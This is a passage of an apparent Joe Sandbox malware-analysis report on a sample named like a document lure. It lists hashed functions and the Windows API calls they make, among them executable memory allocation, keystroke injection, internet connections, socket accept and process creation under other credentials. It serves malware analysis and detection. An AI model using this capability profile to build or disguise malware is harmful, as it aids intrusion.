                                                        • Opcode ID: 7ec9617cf4e5fd88a8adcf60ea611c80752bd86d3a934d35e6251a4e25338ee6
                                                        • Instruction ID: 9a9bfa7201ac2bcd7eb70957fe057a5c39ffddbb8e112a0d9c99fee6191ba593
                                                        • Opcode Fuzzy Hash: 7ec9617cf4e5fd88a8adcf60ea611c80752bd86d3a934d35e6251a4e25338ee6
                                                        • Instruction Fuzzy Hash: 10A1187070110BEBDB15DF68E985AADB7B1FF44310F64816AEC16832D0EB3898B1C796
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?), ref: 00770D85
                                                        • CharLowerBuffW.USER32(?,?), ref: 00770DC8
                                                          • Part of subcall function 00770458: CharLowerBuffW.USER32(?,?,?,?), ref: 00770478
                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00770FB2
                                                        • _memmove.LIBCMT ref: 00770FC2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                        • String ID:
                                                        • API String ID: 3659485706-0
                                                        • Opcode ID: 17149999b68f34682d0d485472a1763594870f5a6577bcce9aa81b84dce01cfc
                                                        • Instruction ID: 48a492967df6889f72730690a3513fbb85b1fd42a0caf5df9a399bcff4578f68
                                                        • Opcode Fuzzy Hash: 17149999b68f34682d0d485472a1763594870f5a6577bcce9aa81b84dce01cfc
                                                        • Instruction Fuzzy Hash: CFB17A71604300DFCB14DF28C88496AB7E4EF89754F14886EF8899B352DB79ED46CB92
                                                        APIs
                                                          • Part of subcall function 007141A7: _fseek.LIBCMT ref: 007141BF
                                                          • Part of subcall function 0075CE59: _wcscmp.LIBCMT ref: 0075CF49
                                                          • Part of subcall function 0075CE59: _wcscmp.LIBCMT ref: 0075CF5C
                                                        • _free.LIBCMT ref: 0075CDC9
                                                        • _free.LIBCMT ref: 0075CDD0
                                                        • _free.LIBCMT ref: 0075CE3B
                                                          • Part of subcall function 007328CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00738715,00000000,007388A3,00734673,?), ref: 007328DE
                                                          • Part of subcall function 007328CA: GetLastError.KERNEL32(00000000,?,00738715,00000000,007388A3,00734673,?), ref: 007328F0
                                                        • _free.LIBCMT ref: 0075CE43
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID:
                                                        • API String ID: 1552873950-0
                                                        • Opcode ID: 30d15ad93e048db68417a13e41db7528ee362282cc2eea407e49c552a100afb3
                                                        • Instruction ID: 9a861005ad4eb68eae557d6a640e081256943aa09133f9c7acd0cb3f61941e49
                                                        • Opcode Fuzzy Hash: 30d15ad93e048db68417a13e41db7528ee362282cc2eea407e49c552a100afb3
                                                        • Instruction Fuzzy Hash: D9514AB1D04218EFDB159F68CC85BEEBBB9BF08300F1000AEB659A3291D7755A848F59
                                                        APIs
                                                        • GetWindowRect.USER32(01788400,?), ref: 0077C354
                                                        • ScreenToClient.USER32(?,00000002), ref: 0077C384
                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0077C3EA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID:
                                                        • API String ID: 3880355969-0
                                                        • Opcode ID: 3cc6c0a59f04025978e974b37b9ce6c5a52f21062aeac324ec956e4c7dbdc558
                                                        • Instruction ID: 41e86b3294201882d9586546cc41f31eb5b2fb4d911542d0b97cad2055a4ec99
                                                        • Opcode Fuzzy Hash: 3cc6c0a59f04025978e974b37b9ce6c5a52f21062aeac324ec956e4c7dbdc558
                                                        • Instruction Fuzzy Hash: 69516171A00204EFCF21DF68D880AAE7BB5BB493A0F20C559F9299B291D774DD41CB51
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0074D258
                                                        • __itow.LIBCMT ref: 0074D292
                                                          • Part of subcall function 0074D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0074D549
                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0074D2FB
                                                        • __itow.LIBCMT ref: 0074D350
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID:
                                                        • API String ID: 3379773720-0
                                                        • Opcode ID: d4794ee91ab2d48e1de2c1131895e9ac6f7d5887ace1fa28172c8ca061246b25
                                                        • Instruction ID: 547c4420d46427653cc35168592ee1230c19e6d860d6fabb66e6b9e762d1ee42
                                                        • Opcode Fuzzy Hash: d4794ee91ab2d48e1de2c1131895e9ac6f7d5887ace1fa28172c8ca061246b25
                                                        • Instruction Fuzzy Hash: FF41B871A00609EBDF25EF58C856FEE7BB9AF48700F000029FA45A71C1DBB89E85CB51
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0075EF32
                                                        • GetLastError.KERNEL32(?,00000000), ref: 0075EF58
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0075EF7D
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0075EFA9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: 79ae80a2a4e49501ac698d39b4e8c9f48cdce4acedc6e9707fc9546b08f26f15
                                                        • Instruction ID: 807c775240aaa069847dc1acbcf4e03f6a484885aa4cf6e8fe3abaa837fa2534
                                                        • Opcode Fuzzy Hash: 79ae80a2a4e49501ac698d39b4e8c9f48cdce4acedc6e9707fc9546b08f26f15
                                                        • Instruction Fuzzy Hash: 28416D35600611DFCB10EF19C549A89BBE5EF89720B15C089EC46AF3A2CB78FD41CB91
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0077B3E1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: e7d4d4116edc2e493877cfde351322d041e8553ca76c262770879f2039bb756c
                                                        • Instruction ID: 21d6f53359df87c3effc7186a02f8a2bef5a01c859ce14ff4d99ab7b265ab389
                                                        • Opcode Fuzzy Hash: e7d4d4116edc2e493877cfde351322d041e8553ca76c262770879f2039bb756c
                                                        • Instruction Fuzzy Hash: CD31A234600284FBEF349E58DC89BA83765EB0A3D0F54C512FA59D71A2C73CD9819B51
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 0077D617
                                                        • GetWindowRect.USER32(?,?), ref: 0077D68D
                                                        • PtInRect.USER32(?,?,0077EB2C), ref: 0077D69D
                                                        • MessageBeep.USER32(00000000), ref: 0077D70E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: 6975349f8a6b1c2d599e030e9065e972298454f169dab5e4b3f69289a07f1279
                                                        • Instruction ID: 71653c8db4298ab9ec167cdcbd610ed2d36e5e4ea0138b7a9f828a13485189c2
                                                        • Opcode Fuzzy Hash: 6975349f8a6b1c2d599e030e9065e972298454f169dab5e4b3f69289a07f1279
                                                        • Instruction Fuzzy Hash: 61414730A00118EFCF25CF98D884AA97BF5BF49390F18C1AAE449DB251E739EC51DB90
                                                        APIs
                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 007544EE
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0075450A
                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 0075456A
                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 007545C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: 0d180443b62329127b9fb8f836b390589bb3ce7b5f0d417423eda3b65a2b0b94
                                                        • Instruction ID: 12eb23cbc60c63f761cb4d8068b9c3a62bc43cc14d477ad4062cf3d7398f470f
                                                        • Opcode Fuzzy Hash: 0d180443b62329127b9fb8f836b390589bb3ce7b5f0d417423eda3b65a2b0b94
                                                        • Instruction Fuzzy Hash: 813109719002589FEF348B6488087FE7BB59B4931AF04016AF881531D1E7FC9EADD761
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00744DE8
                                                        • __isleadbyte_l.LIBCMT ref: 00744E16
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00744E44
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00744E7A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 625478ed78a08903bbc6f8824a65ed8400eb6f27c75a47a57f2a21eef11181c1
                                                        • Instruction ID: 7da9b0a886f9f527e76381cd254ed4305a983a8abe082dc69431a67751e50775
                                                        • Opcode Fuzzy Hash: 625478ed78a08903bbc6f8824a65ed8400eb6f27c75a47a57f2a21eef11181c1
                                                        • Instruction Fuzzy Hash: 6531CF31A00266EFDF219F74CC49BAA7BA6FF41310F158529E821871A1E738EC51EB90
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00777AB6
                                                          • Part of subcall function 007569C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 007569E3
                                                          • Part of subcall function 007569C9: GetCurrentThreadId.KERNEL32 ref: 007569EA
                                                          • Part of subcall function 007569C9: AttachThreadInput.USER32(00000000,?,00758127), ref: 007569F1
                                                        • GetCaretPos.USER32(?), ref: 00777AC7
                                                        • ClientToScreen.USER32(00000000,?), ref: 00777B00
                                                        • GetForegroundWindow.USER32 ref: 00777B06
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: 0587964b9b6474fc78de46e8fb5aa8bac144aabe7247acce835cb163ae80a516
                                                        • Instruction ID: ca0c7937c11b1d3340da90fc9251bea0a8888eddde38be8f854a790b830affed
                                                        • Opcode Fuzzy Hash: 0587964b9b6474fc78de46e8fb5aa8bac144aabe7247acce835cb163ae80a516
                                                        • Instruction Fuzzy Hash: 1031FE71D00118AFDB10EFB5D8859EFBBF9EF58314B10846AE815E7211D679AE058BA0
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007649B7
                                                          • Part of subcall function 00764A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00764A60
                                                          • Part of subcall function 00764A41: InternetCloseHandle.WININET(00000000), ref: 00764AFD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 1463438336-0
                                                        • Opcode ID: 53c5622e8e9bf4cca789c1051c3a52a1c603bd248ac4d9b912662dd93b891d50
                                                        • Instruction ID: ca8b0d841d829900534ee5e3102e48a58d209a873f5d0bd9f61c78fc58eea52c
                                                        • Opcode Fuzzy Hash: 53c5622e8e9bf4cca789c1051c3a52a1c603bd248ac4d9b912662dd93b891d50
                                                        • Instruction Fuzzy Hash: EA21A431240B05BFDB129FA0CC04FBBBBA9FB48711F14801AFE0796550EB799811A794
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0074BCD9
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0074BCE0
                                                        • CloseHandle.KERNEL32(00000004), ref: 0074BCFA
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0074BD29
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 2621361867-0
                                                        • Opcode ID: 2d09e987f443cb591e43bbc450f3ccb61f5038913a275e30cb662de800aca25f
                                                        • Instruction ID: 3e1a5e5554f7c4de6ce38f98f2181ce32bae2b93ded46735b70a33c567602620
                                                        • Opcode Fuzzy Hash: 2d09e987f443cb591e43bbc450f3ccb61f5038913a275e30cb662de800aca25f
                                                        • Instruction Fuzzy Hash: C2214D7250120DEBDF119FA8ED89BEE7BA9EF08314F048065FA01A6160C77ADD61DB60
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 007788A3
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007788BD
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007788CB
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007788D9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$AttributesLayered
                                                        • String ID:
                                                        • API String ID: 2169480361-0
                                                        • Opcode ID: ee4958145a48bb05ba31788c341cc5f41ea139cd8233dd928856e6ed45fb9c15
                                                        • Instruction ID: 08dd569b923ad11868c930e9d4d2d97b8b5335fdf28fcf19e334d529274bf67b
                                                        • Opcode Fuzzy Hash: ee4958145a48bb05ba31788c341cc5f41ea139cd8233dd928856e6ed45fb9c15
                                                        • Instruction Fuzzy Hash: A011AF31395110AFDF14AB28DC09FBA77A9EF89360F048119F91AC72E1CB78AD41C796
                                                        APIs
                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0076906D
                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0076907F
                                                        • accept.WS2_32(00000000,00000000,00000000), ref: 0076908C
                                                        • WSAGetLastError.WS2_32(00000000), ref: 007690A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastacceptselect
                                                        • String ID:
                                                        • API String ID: 385091864-0
                                                        • Opcode ID: aa4f025fc9d68d1e865356a9bd84c4d3218a1baf61fa414b0704964d32aa28f0
                                                        • Instruction ID: e47940808c3dc8fe6cd9e401fed7939edc31b5d998b3b957a258760613063b66
                                                        • Opcode Fuzzy Hash: aa4f025fc9d68d1e865356a9bd84c4d3218a1baf61fa414b0704964d32aa28f0
                                                        • Instruction Fuzzy Hash: 3A215771500124AFC720DF69D845A9A7BFCEF49710F00816AF949D7291D678DE41CFA0
                                                        APIs
                                                          • Part of subcall function 00752CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007518FD,?,?,?,007526BC,00000000,000000EF,00000119,?,?), ref: 00752CB9
                                                          • Part of subcall function 00752CAA: lstrcpyW.KERNEL32(00000000,?,?,007518FD,?,?,?,007526BC,00000000,000000EF,00000119,?,?,00000000), ref: 00752CDF
                                                          • Part of subcall function 00752CAA: lstrcmpiW.KERNEL32(00000000,?,007518FD,?,?,?,007526BC,00000000,000000EF,00000119,?,?), ref: 00752D10
                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007526BC,00000000,000000EF,00000119,?,?,00000000), ref: 00751916
                                                        • lstrcpyW.KERNEL32(00000000,?,?,007526BC,00000000,000000EF,00000119,?,?,00000000), ref: 0075193C
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,007526BC,00000000,000000EF,00000119,?,?,00000000), ref: 00751970
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
